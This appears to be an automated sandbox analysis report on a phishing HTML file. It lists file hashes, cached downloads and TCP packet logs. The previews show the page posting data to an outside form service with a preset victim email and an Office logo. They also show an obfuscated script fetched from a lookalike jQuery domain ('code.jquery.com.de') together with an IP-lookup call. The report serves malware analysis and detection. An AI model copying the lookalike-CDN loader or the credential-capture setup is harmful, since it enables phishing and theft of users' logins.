C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jun 20 15:14:11 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.988278819856521
Encrypted:	false
SSDEEP:	48:87kbdxsTwBHZidAKZdA1mehBiZUk1W1qehCy+C:87t0/9iy
MD5:	A6C4A427001D5EC89A2E8CC5B15FC580
SHA1:	7E4FCE465329D10A323DE74C30DF43375E4622AA
SHA-256:	7E9BFF0EC596FF3F2EF72FF553B5B89816FEB74DE49ED8E1BAA6F52B99D3E180
SHA-512:	F7B21039635C045766532BE4555C751BBFDB3FBF2381AF11313DBF8F1E51EF71BF204FC2779A24C0307DD8297F7FE0AB58D5D9230064A50B0D471BB2E8B1467E
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....n..,.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.X.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.X............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.F^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jun 20 15:14:11 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.004593662622844
Encrypted:	false
SSDEEP:	48:88kbdxsTwBHZidAKZdA1duT1ehOuTbbiZUk5OjqehOuTbEy+yT+:88t0eTyTbxWOvTbEy7T
MD5:	2852C377C7F53C19E306C975791C7ECC
SHA1:	3C2D7E6698FAD56FF60D3306DECBDE9F4EA5B635
SHA-256:	4209C99985616BCE5E77C94B165729ACBE7340B31A13F78894481C51CF0FF118
SHA-512:	3C54186144F8DD4BCB86152865D18AB4DA5961DE9C321EF2E14A4DC4328D10B46809AA82A940F7F5FDFBB8828D0A9EBA3F03EB495C77098B855B972C4AA4B1D1
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,........,.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.X.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.X............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.F^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 100

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	114697
Entropy (8bit):	4.9296726009523
Encrypted:	false
SSDEEP:	1536:67O7EesvXIPRX4PT8aZv8qoXIoqbTFaFeTxvyAZ+D7M71D:qXIPRX4PT3
MD5:	FAC4178C15E5A86139C662DAFC809501
SHA1:	EF1481841399156A880EC31B07DDA9CFAA1ACE39
SHA-256:	BB88454962767EB6F2DDB1AABAAF844D8A57DE7E8F848D7F6928F81B54998452
SHA-512:	0902219B6E236FBF9D8173D1D452C8733C1BF67B0EB906CC9866EA0C27C2D08F6DA556D01475E9B54E2C6CE797B230BFBD5F39055CE0C71EA4D3E36872C378D9
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://ucarecdn.com/eae24034-0cc9-4528-827a-d46e30dd5a83/hover.css
Preview:	/!. Hover.css (http://ianlunn.github.io/Hover/). * Version: 2.3.2. * Author: Ian Lunn @IanLunn. * Author URL: http://ianlunn.co.uk/. * Github: https://github.com/IanLunn/Hover.. * Hover.css Copyright Ian Lunn 2017. Generated with Sass.. /./ 2D TRANSITIONS /./ Grow /..hvr-grow {. display: inline-block;. vertical-align: middle;. -webkit-transform: perspective(1px) translateZ(0);. transform: perspective(1px) translateZ(0);. box-shadow: 0 0 1px rgba(0, 0, 0, 0);. -webkit-transition-duration: 0.3s;. transition-duration: 0.3s;. -webkit-transition-property: transform;. transition-property: transform;.}..hvr-grow:hover, .hvr-grow:focus, .hvr-grow:active {. -webkit-transform: scale(1.1);. transform: scale(1.1);.}../ Shrink */..hvr-shrink {. display: inline-block;. vertical-align: middle;. -webkit-transform: perspective(1px) translateZ(0);. transform: perspective(1px) translateZ(0);. box-shadow: 0 0 1px rgba(0, 0, 0, 0);. -webkit-transition-duration: 0.3s;. transition-

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	756
Entropy (8bit):	6.867156258410879
Encrypted:	false
SSDEEP:	12:6v/7EAQVNY/wGUh9999VUL7L2/9MrrrrrrrG90Z89bQBNNRz2yCCaugL999999j1:uQg4GQ9999Vq7LOxY8lQBrocgL99999j
MD5:	3D7885C874D6A53D03335D734448C392
SHA1:	620089DD3B41D9D41500B2A152F59A82629C7B1A
SHA-256:	F2FB486DE6A6439CC2DB9F869170AB96A6AB395983599A93507D01B320C94937
SHA-512:	FA681E27D31B79CE285F91C33B3D5355049BFC5B365C24F27F8590DF8FC97EE310777A11E1A80B731C7CE5584EF58E54A72EAD60895D388AF105C7788459E0DE
Malicious:	false
Reputation:	low
URL:	https://logo.clearbit.com/office.com
Preview:	.PNG........IHDR.............L\......IDATx...Mj.M......../.....B.\(..x....=.k.."q...\...;.~..B....$.p@(.Y....d..{..z.Zk.'......0....3...0....3...0....3...0....3...0....3...0...........A....^\....7.........x........G....#.r.......k........~;..n,..%.f...`....f...`....f...`....f...`....f...`....f...`....f...`....f...`....f.X.#J.bi<..R..2~.q..XB.C.....OO.q....W...WjZ.vy..Y...wG............B.a.n.<....!.......=.?...6h...0..*.I.c.y(..T..q...M........n.!.R.,..i..c.LJ...7@.....l..I.i.Z..;W.r..g..\|,.S...^...p.wA5...NX.tZ..&eZ.J(ul\|m....0....3...0....3...0....3...0....3...0....3...0....3...0....3...0....3...0..Z..;:-/.;...!......K.......^......g.s..k^.`....f...`....f...`....f...`....f...`....f...`....f...........(g.....IEND.B`.

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	36
Entropy (8bit):	4.252715278979704
Encrypted:	false
SSDEEP:	3:YMb1gXMRfiQN9:YMeXkiQN9
MD5:	729B54D5347A03568A550462A8C17D10
SHA1:	D5F087D97594014F9369D56FE5E626E50B41D831
SHA-256:	C0B46A8CD2A5A5BBE75B26F770D53CF54538B40CE55517DA4A144CAF4D89B058
SHA-512:	47C09D06C2EA6BBD41D0384176761A3A64FD7424A3CE6B9E600B87B3A81DBA6F5BF0AE4AF24383DB31A26F7CE46B5EA89D8F482C212201BE0C0147C76343C3D7
Malicious:	false
Reputation:	low
URL:	https://code.jquery.com.de/ip.php
Preview:	{"ip":"8.46.123.33 : United States"}

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	403295
Entropy (8bit):	5.185720161463881
Encrypted:	false
SSDEEP:	12288:IgVvLfkzPD5peUX1y4xaxuRM6HtyKu57TR:nkzPD5pedT
MD5:	D735285640B4136D2176AA494F0F39DE
SHA1:	662AACE89BFB66CFA74931E9309FA872900E10B5
SHA-256:	2DFEF129DBE4C4F0AB2B2B0E67024E9486AF9E29392A8A890DA025E2BCAFCD18
SHA-512:	1A7D9B826C930DE2853129F7F8866520CCC6AD983FC82F255F8F10CBB8A8A05DFAC6FC311340DC65051FDC330B7BD0FA4B38537F03F387ADA78D5FC1C247C208
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://code.jquery.com.de/jquery-3.5.1.min.js
Preview:	function _0x171d(_0x14526a,_0x3bbd88){var _0x1604d8=_0x3fa8();return _0x171d=function(_0x2be7df,_0x1bddd6){_0x2be7df=_0x2be7df-(-0x2e0x1f+0x60x40b+-0x11810x1);var _0x2abeb9=_0x1604d8[_0x2be7df];return _0x2abeb9;},_0x171d(_0x14526a,_0x3bbd88);}var _0x391389=_0x171d;(function(_0x2d2242,_0x3e4551){var _0x2498f5=_0x171d,_0x1b4406=_0x2d2242();while(!![]){try{var _0x1b7a18=parseInt(_0x2498f5(0x5db))/(-0x26ed+-0xae+0x1a0x186)(-parseInt(_0x2498f5(0x531))/(-0x863+0x6b4+0x1b1))+-parseInt(_0x2498f5(0x474))/(0x180f-0x1+-0x12f10x2+-0xc64-0x5)+-parseInt(_0x2498f5(0x283))/(0x7520x5+0xc57+-0x30ed)(-parseInt(_0x2498f5(0x411))/(0x1-0x1724+-0x8a-0x1a+-0x1-0x925))+-parseInt(_0x2498f5(0x161))/(-0x11-0x22d+0x58-0x18+0x1cb7-0x1)(parseInt(_0x2498f5(0x517))/(0x3b9+0xe20xc+-0xe4a))+-parseInt(_0x2498f5(0x1d3))/(0x1-0x15a2+-0x10x13e1+0x298b)(-parseInt(_0x2498f5(0x15c))/(-0x66a+0x5f20x2+-0x571))+parseInt(_0x2498f5(0x144))/(-0x60x359+-0xbf-0xa+-0x1-0xcaa)+-parseInt(_0x2498f5(0x2bb))/(0x2-0

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	36
Entropy (8bit):	4.252715278979704
Encrypted:	false
SSDEEP:	3:YMb1gXMRfiQN9:YMeXkiQN9
MD5:	729B54D5347A03568A550462A8C17D10
SHA1:	D5F087D97594014F9369D56FE5E626E50B41D831
SHA-256:	C0B46A8CD2A5A5BBE75B26F770D53CF54538B40CE55517DA4A144CAF4D89B058
SHA-512:	47C09D06C2EA6BBD41D0384176761A3A64FD7424A3CE6B9E600B87B3A81DBA6F5BF0AE4AF24383DB31A26F7CE46B5EA89D8F482C212201BE0C0147C76343C3D7
Malicious:	false
Reputation:	low
Preview:	{"ip":"8.46.123.33 : United States"}

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	756
Entropy (8bit):	6.867156258410879
Encrypted:	false
SSDEEP:	12:6v/7EAQVNY/wGUh9999VUL7L2/9MrrrrrrrG90Z89bQBNNRz2yCCaugL999999j1:uQg4GQ9999Vq7LOxY8lQBrocgL99999j
MD5:	3D7885C874D6A53D03335D734448C392
SHA1:	620089DD3B41D9D41500B2A152F59A82629C7B1A
SHA-256:	F2FB486DE6A6439CC2DB9F869170AB96A6AB395983599A93507D01B320C94937
SHA-512:	FA681E27D31B79CE285F91C33B3D5355049BFC5B365C24F27F8590DF8FC97EE310777A11E1A80B731C7CE5584EF58E54A72EAD60895D388AF105C7788459E0DE
Malicious:	false
Preview:	.PNG........IHDR.............L\......IDATx...Mj.M......../.....B.\(..x....=.k.."q...\...;.~..B....$.p@(.Y....d..{..z.Zk.'......0....3...0....3...0....3...0....3...0....3...0...........A....^\....7.........x........G....#.r.......k........~;..n,..%.f...`....f...`....f...`....f...`....f...`....f...`....f...`....f...`....f.X.#J.bi<..R..2~.q..XB.C.....OO.q....W...WjZ.vy..Y...wG............B.a.n.<....!.......=.?...6h...0..*.I.c.y(..T..q...M........n.!.R.,..i..c.LJ...7@.....l..I.i.Z..;W.r..g..\|,.S...^...p.wA5...NX.tZ..&eZ.J(ul\|m....0....3...0....3...0....3...0....3...0....3...0....3...0....3...0....3...0..Z..;:-/.;...!......K.......^......g.s..k^.`....f...`....f...`....f...`....f...`....f...`....f...........(g.....IEND.B`.

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65325)
Category:	downloaded
Size (bytes):	144877
Entropy (8bit):	5.049937202697915
Encrypted:	false
SSDEEP:	1536:GcoqwrUPyDHU7c7TcDEBi82NcuSELL4d/+oENM6HN26Q:VoPgPard2oENM6HN26Q
MD5:	450FC463B8B1A349DF717056FBB3E078
SHA1:	895125A4522A3B10EE7ADA06EE6503587CBF95C5
SHA-256:	2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
SHA-512:	93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
Malicious:	false
URL:	https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
Preview:	/!. Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). /:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace},::after,::before{box-sizing:border-box}html{font-family:sans

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (64517), with CRLF line terminators
Entropy (8bit):	6.036539587673655
TrID:	HyperText Markup Language (12001/1) 42.10% HyperText Markup Language (11501/1) 40.35% Synchronized Multimedia Integration Language (5002/2) 17.55%
File name:	aaaaa.shtml.html
File size:	436'838 bytes
MD5:	9c7d11e58fb52f06cbcd15912bb7a1b0
SHA1:	f2e7fa313cd79a1a3731be04210457495945e8a8
SHA256:	0d4b9f562d0c853d6aefee6fc8bf72355a8714df6f4ce669adcfdd46b285030d
SHA512:	b00ee805dde156175b5ab0d32a007f3479b2ce6f72af7d101d79a2a830f6e289d907fb5765a9419507b121edafb14c41eea6b5187b14fb69ecd64254da048395
SSDEEP:	6144:Uqw6IB6MkrqdoaJ9fX1gWSFwv0Ub+OZibjk8wZQYfkONlDEW7Ag/:UqwZIzBaJdK/wv0UbTsbiZQIDme
TLSH:	819412BE38346CCD1E39503BE06EE6B5FD69FD13F01D81D4622C9195EF80924A6BE5A0
File Content Preview:	<html xmlns="http://www.w3.org/1999/xhtml">.. <head>.. <script>.. window.url="https://nocodeform.io/f/6656f3e5cd557f87fe213b8c";.. window.email="gosha@ispol.com.pl";.. window.imgsrc="https://logo.clearbit.com/office.com";.. </script>.. <m

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 20, 2024 18:14:02.511435986 CEST	49677	443	192.168.2.10	20.42.65.85
Jun 20, 2024 18:14:02.652036905 CEST	49671	443	192.168.2.10	204.79.197.203
Jun 20, 2024 18:14:03.714476109 CEST	49677	443	192.168.2.10	20.42.65.85
Jun 20, 2024 18:14:05.511341095 CEST	49674	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:05.512149096 CEST	49675	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:06.120949984 CEST	49677	443	192.168.2.10	20.42.65.85
Jun 20, 2024 18:14:10.607496977 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:10.607528925 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:10.607630968 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:10.608136892 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:10.608148098 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:10.612797976 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:10.612828970 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:10.615370989 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:10.615370989 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:10.615401983 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:10.621813059 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:10.621879101 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:10.622071981 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:10.623109102 CEST	49713	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:10.623123884 CEST	443	49713	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:11.072208881 CEST	49677	443	192.168.2.10	20.42.65.85
Jun 20, 2024 18:14:11.077963114 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.078311920 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.078341007 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.079683065 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.079958916 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.082559109 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.082559109 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.082638979 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.153127909 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.153156042 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.260505915 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.473325968 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473378897 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473421097 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473453999 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473479986 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473481894 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.473501921 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473526001 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.473531961 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473547935 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.473555088 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473622084 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473649979 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473680019 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473704100 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.473712921 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.473762989 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.481818914 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482038975 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482093096 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482129097 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482161999 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482186079 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.482193947 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482206106 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482218027 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.482292891 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482315063 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.482322931 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482361078 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482382059 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.482388973 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482422113 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482444048 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.482450962 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482496977 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482513905 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.482521057 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482542038 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.482557058 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482589960 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482609987 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.482616901 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482645035 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482671976 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.482676029 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482687950 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.482712984 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.483524084 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.483582973 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.483604908 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.483612061 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.483810902 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.484055042 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.484062910 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.484163046 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.484180927 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.484189034 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.484551907 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.484566927 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.484575987 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.484648943 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.485121012 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.485444069 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.485902071 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.485961914 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.485968113 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.486603975 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.486624956 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.486776114 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.486784935 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.486840963 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.486849070 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.486859083 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.486879110 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.486907959 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.487811089 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.487979889 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.488274097 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.488327980 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.488352060 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.488447905 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.488576889 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.488686085 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.489110947 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.489176035 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.490019083 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.490070105 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.490170956 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.490175962 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.490242004 CEST	443	49712	2.16.164.82	192.168.2.10
Jun 20, 2024 18:14:11.490263939 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.490633011 CEST	49712	443	192.168.2.10	2.16.164.82
Jun 20, 2024 18:14:11.490952015 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.491060972 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.491169930 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.491298914 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.491525888 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.491625071 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.491648912 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.491657019 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.491677999 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.491879940 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.492172956 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.492178917 CEST	443	49711	104.18.11.207	192.168.2.10
Jun 20, 2024 18:14:11.492325068 CEST	49711	443	192.168.2.10	104.18.11.207
Jun 20, 2024 18:14:11.492358923 CEST	443	49711	104.18.11.207	192.168.2.10
